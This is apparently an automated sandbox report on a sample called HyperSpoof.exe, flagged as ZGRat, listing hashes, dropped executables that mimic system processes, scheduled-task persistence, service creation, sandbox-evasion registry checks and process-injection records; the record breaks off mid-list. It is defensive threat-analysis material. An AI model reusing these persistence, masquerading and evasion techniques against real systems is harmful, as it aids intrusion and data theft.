Analysis
-
max time kernel
70s -
max time network
70s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
09-05-2024 01:19
Static task
static1
Behavioral task
behavioral1
Sample
HyperSpoof.exe
Resource
win7-20240508-en
Errors
General
-
Target
HyperSpoof.exe
-
Size
172KB
-
MD5
ca27199cf4415233d9297b430dcf9924
-
SHA1
8b21031c8e4a1c5c89c5a70b293cf401b08cb5a4
-
SHA256
71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e
-
SHA512
af5c81a1859a3786baff02aac13057f0261ac697209151ce6b8d39f37115d5a6bd471a9cd348d351382c0dd69a828628cf0b38c49f0b9c9ca498e3de539f16ac
-
SSDEEP
1536:tZkNU8lY/Nz2M0SrbG8XbXUVF5486VQTGRhih2TKbWTwLpVD7ZTcXx:tZ8VA0mG8XbXw56xhi8TKJFA
Malware Config
Signatures
-
Detect ZGRat V1 4 IoCs
Processes:
resource yara_rule behavioral1/files/0x0010000000016dde-93.dat family_zgrat_v1 behavioral1/files/0x0006000000019381-166.dat family_zgrat_v1 behavioral1/memory/2400-170-0x0000000000E50000-0x0000000001054000-memory.dmp family_zgrat_v1 behavioral1/memory/2208-255-0x00000000012B0000-0x00000000014B4000-memory.dmp family_zgrat_v1 -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2744 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2876 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2528 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2640 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2788 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2548 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2780 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1680 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2756 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2752 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2516 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2552 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2600 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2948 1688 schtasks.exe 61 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2580 1688 schtasks.exe 61 -
Nirsoft 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x0007000000004e76-89.dat Nirsoft behavioral1/files/0x0008000000017495-133.dat Nirsoft -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid Process 3 1932 powershell.exe 5 1932 powershell.exe 7 1932 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1932 powershell.exe 776 powershell.exe 2416 powershell.exe 1552 powershell.exe 1208 powershell.exe 2588 powershell.exe 2352 powershell.exe 2964 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
HpsrSpoof.exesphyperRuntimedhcpSvc.execonhostsft.exeVolumeid64.exe.conhostsft.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exesphyperRuntimedhcpSvc.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exespoolsv.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeVC_redist.x64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exepid Process 1608 HpsrSpoof.exe 2592 sphyperRuntimedhcpSvc.exe 2220 conhostsft.exe 2236 Volumeid64.exe 1220 2212 .conhostsft.exe 2368 DevManView.exe 2956 DevManView.exe 2268 DevManView.exe 2276 DevManView.exe 2892 DevManView.exe 1684 DevManView.exe 576 DevManView.exe 2320 DevManView.exe 276 DevManView.exe 1820 DevManView.exe 3028 DevManView.exe 572 DevManView.exe 2428 DevManView.exe 2836 DevManView.exe 2408 DevManView.exe 2400 sphyperRuntimedhcpSvc.exe 2028 AMIDEWINx64.exe 2676 AMIDEWINx64.exe 1656 AMIDEWINx64.exe 548 AMIDEWINx64.exe 536 AMIDEWINx64.exe 1044 AMIDEWINx64.exe 1696 AMIDEWINx64.exe 1444 AMIDEWINx64.exe 1816 AMIDEWINx64.exe 1936 AMIDEWINx64.exe 2772 AMIDEWINx64.exe 2760 AMIDEWINx64.exe 2636 AMIDEWINx64.exe 2664 AMIDEWINx64.exe 2740 AMIDEWINx64.exe 1036 AMIDEWINx64.exe 2828 AMIDEWINx64.exe 704 AMIDEWINx64.exe 3024 AMIDEWINx64.exe 2252 AMIDEWINx64.exe 2208 spoolsv.exe 2220 AMIDEWINx64.exe 2288 AMIDEWINx64.exe 2492 AMIDEWINx64.exe 796 AMIDEWINx64.exe 2480 AMIDEWINx64.exe 2428 AMIDEWINx64.exe 1488 AMIDEWINx64.exe 2064 AMIDEWINx64.exe 1600 AMIDEWINx64.exe 1544 AMIDEWINx64.exe 476 3024 VC_redist.x64.exe 2660 Volumeid64.exe 1928 Volumeid64.exe 1640 Volumeid64.exe 2892 Volumeid64.exe 2288 Volumeid64.exe 2192 Volumeid64.exe 1320 Volumeid64.exe 1788 Volumeid64.exe 556 Volumeid64.exe -
Loads dropped DLL 9 IoCs
Processes:
powershell.execmd.execonhostsft.execmd.execmd.execmd.exepid Process 1932 powershell.exe 1652 cmd.exe 2220 conhostsft.exe 2220 conhostsft.exe 1284 cmd.exe 1116 cmd.exe 1116 cmd.exe 1588 cmd.exe 476 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 30 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
DevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exedescription ioc Process File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\F: DevManView.exe File opened (read-only) \??\D: DevManView.exe -
Maps connected drives based on registry 3 TTPs 30 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
DevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum DevManView.exe -
Drops file in System32 directory 4 IoCs
Processes:
.conhostsft.exepowershell.exeVC_redist.x64.exepowershell.exedescription ioc Process File opened for modification C:\Windows\system32\MRT.exe .conhostsft.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe VC_redist.x64.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
VC_redist.x64.exedescription pid Process procid_target PID 3024 set thread context of 604 3024 VC_redist.x64.exe 228 -
Drops file in Program Files directory 4 IoCs
Processes:
sphyperRuntimedhcpSvc.exedescription ioc Process File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe sphyperRuntimedhcpSvc.exe File created C:\Program Files (x86)\Windows Photo Viewer\fr-FR\f3b6ecef712a24 sphyperRuntimedhcpSvc.exe File created C:\Program Files\Windows Defender\fr-FR\lsass.exe sphyperRuntimedhcpSvc.exe File created C:\Program Files\Windows Defender\fr-FR\6203df4a6bafc7 sphyperRuntimedhcpSvc.exe -
Drops file in Windows directory 3 IoCs
Processes:
DevManView.exewusa.exewusa.exedescription ioc Process File opened for modification C:\Windows\INF\setupapi.app.log DevManView.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid Process 1772 sc.exe 2964 sc.exe 1864 sc.exe 2084 sc.exe 2564 sc.exe 2520 sc.exe 2392 sc.exe 2672 sc.exe 1332 sc.exe 1796 sc.exe 896 sc.exe 1672 sc.exe 2332 sc.exe 2880 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 60 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
DevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exedescription ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_Dell&Prod_THINAIR_DISK DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI DevManView.exe -
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 2744 schtasks.exe 2876 schtasks.exe 2528 schtasks.exe 2948 schtasks.exe 2788 schtasks.exe 2780 schtasks.exe 2516 schtasks.exe 2600 schtasks.exe 2640 schtasks.exe 2548 schtasks.exe 1680 schtasks.exe 2752 schtasks.exe 2756 schtasks.exe 2552 schtasks.exe 2580 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a7fb12afa1da01 powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
HyperSpoof.exepowershell.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exesphyperRuntimedhcpSvc.exepid Process 1688 HyperSpoof.exe 1688 HyperSpoof.exe 1688 HyperSpoof.exe 1688 HyperSpoof.exe 1932 powershell.exe 1932 powershell.exe 1932 powershell.exe 1932 powershell.exe 1932 powershell.exe 1932 powershell.exe 1932 powershell.exe 2268 DevManView.exe 2956 DevManView.exe 2368 DevManView.exe 1684 DevManView.exe 2276 DevManView.exe 2892 DevManView.exe 576 DevManView.exe 2320 DevManView.exe 276 DevManView.exe 1820 DevManView.exe 3028 DevManView.exe 572 DevManView.exe 2428 DevManView.exe 2836 DevManView.exe 2408 DevManView.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe 2400 sphyperRuntimedhcpSvc.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 476 476 476 476 476 476 476 476 476 476 476 476 476 476 476 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
HyperSpoof.exepowershell.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exedescription pid Process Token: SeDebugPrivilege 1688 HyperSpoof.exe Token: SeDebugPrivilege 1932 powershell.exe Token: SeBackupPrivilege 2368 DevManView.exe Token: SeRestorePrivilege 2368 DevManView.exe Token: SeBackupPrivilege 2956 DevManView.exe Token: SeRestorePrivilege 2956 DevManView.exe Token: SeTakeOwnershipPrivilege 2956 DevManView.exe Token: SeTakeOwnershipPrivilege 2368 DevManView.exe Token: SeBackupPrivilege 2268 DevManView.exe Token: SeRestorePrivilege 2268 DevManView.exe Token: SeTakeOwnershipPrivilege 2268 DevManView.exe Token: SeImpersonatePrivilege 2268 DevManView.exe Token: SeImpersonatePrivilege 2956 DevManView.exe Token: SeBackupPrivilege 1684 DevManView.exe Token: SeRestorePrivilege 1684 DevManView.exe Token: SeTakeOwnershipPrivilege 1684 DevManView.exe Token: SeImpersonatePrivilege 1684 DevManView.exe Token: SeBackupPrivilege 2276 DevManView.exe Token: SeRestorePrivilege 2276 DevManView.exe Token: SeTakeOwnershipPrivilege 2276 DevManView.exe Token: SeImpersonatePrivilege 2276 DevManView.exe Token: SeBackupPrivilege 2892 DevManView.exe Token: SeRestorePrivilege 2892 DevManView.exe Token: SeTakeOwnershipPrivilege 2892 DevManView.exe Token: SeImpersonatePrivilege 2892 DevManView.exe Token: SeImpersonatePrivilege 2368 DevManView.exe Token: SeBackupPrivilege 576 DevManView.exe Token: SeRestorePrivilege 576 DevManView.exe Token: SeTakeOwnershipPrivilege 576 DevManView.exe Token: SeBackupPrivilege 2320 DevManView.exe Token: SeRestorePrivilege 2320 DevManView.exe Token: SeTakeOwnershipPrivilege 2320 DevManView.exe Token: SeLoadDriverPrivilege 2368 DevManView.exe Token: SeBackupPrivilege 276 DevManView.exe Token: SeRestorePrivilege 276 DevManView.exe Token: SeTakeOwnershipPrivilege 276 DevManView.exe Token: SeBackupPrivilege 1820 DevManView.exe Token: SeRestorePrivilege 1820 DevManView.exe Token: SeTakeOwnershipPrivilege 1820 DevManView.exe Token: SeImpersonatePrivilege 576 DevManView.exe Token: SeImpersonatePrivilege 2320 DevManView.exe Token: SeBackupPrivilege 3028 DevManView.exe Token: SeRestorePrivilege 3028 DevManView.exe Token: SeTakeOwnershipPrivilege 3028 DevManView.exe Token: SeBackupPrivilege 572 DevManView.exe Token: SeImpersonatePrivilege 276 DevManView.exe Token: SeRestorePrivilege 572 DevManView.exe Token: SeTakeOwnershipPrivilege 572 DevManView.exe Token: SeImpersonatePrivilege 1820 DevManView.exe Token: SeLoadDriverPrivilege 276 DevManView.exe Token: SeImpersonatePrivilege 572 DevManView.exe Token: SeImpersonatePrivilege 3028 DevManView.exe Token: SeBackupPrivilege 2428 DevManView.exe Token: SeRestorePrivilege 2428 DevManView.exe Token: SeTakeOwnershipPrivilege 2428 DevManView.exe Token: SeImpersonatePrivilege 2428 DevManView.exe Token: SeBackupPrivilege 2836 DevManView.exe Token: SeRestorePrivilege 2836 DevManView.exe Token: SeTakeOwnershipPrivilege 2836 DevManView.exe Token: SeImpersonatePrivilege 2836 DevManView.exe Token: SeLoadDriverPrivilege 2368 DevManView.exe Token: SeBackupPrivilege 2408 DevManView.exe Token: SeLoadDriverPrivilege 276 DevManView.exe Token: SeRestorePrivilege 2408 DevManView.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
HyperSpoof.exepowershell.exeHpsrSpoof.execmd.exesphyperRuntimedhcpSvc.execonhostsft.execmd.exedescription pid Process procid_target PID 1688 wrote to memory of 1932 1688 HyperSpoof.exe 28 PID 1688 wrote to memory of 1932 1688 HyperSpoof.exe 28 PID 1688 wrote to memory of 1932 1688 HyperSpoof.exe 28 PID 1932 wrote to memory of 1608 1932 powershell.exe 30 PID 1932 wrote to memory of 1608 1932 powershell.exe 30 PID 1932 wrote to memory of 1608 1932 powershell.exe 30 PID 1932 wrote to memory of 2592 1932 powershell.exe 32 PID 1932 wrote to memory of 2592 1932 powershell.exe 32 PID 1932 wrote to memory of 2592 1932 powershell.exe 32 PID 1932 wrote to memory of 2592 1932 powershell.exe 32 PID 1932 wrote to memory of 2220 1932 powershell.exe 33 PID 1932 wrote to memory of 2220 1932 powershell.exe 33 PID 1932 wrote to memory of 2220 1932 powershell.exe 33 PID 1932 wrote to memory of 2220 1932 powershell.exe 33 PID 1608 wrote to memory of 1652 1608 HpsrSpoof.exe 34 PID 1608 wrote to memory of 1652 1608 HpsrSpoof.exe 34 PID 1608 wrote to memory of 1652 1608 HpsrSpoof.exe 34 PID 1652 wrote to memory of 2236 1652 cmd.exe 36 PID 1652 wrote to memory of 2236 1652 cmd.exe 36 PID 1652 wrote to memory of 2236 1652 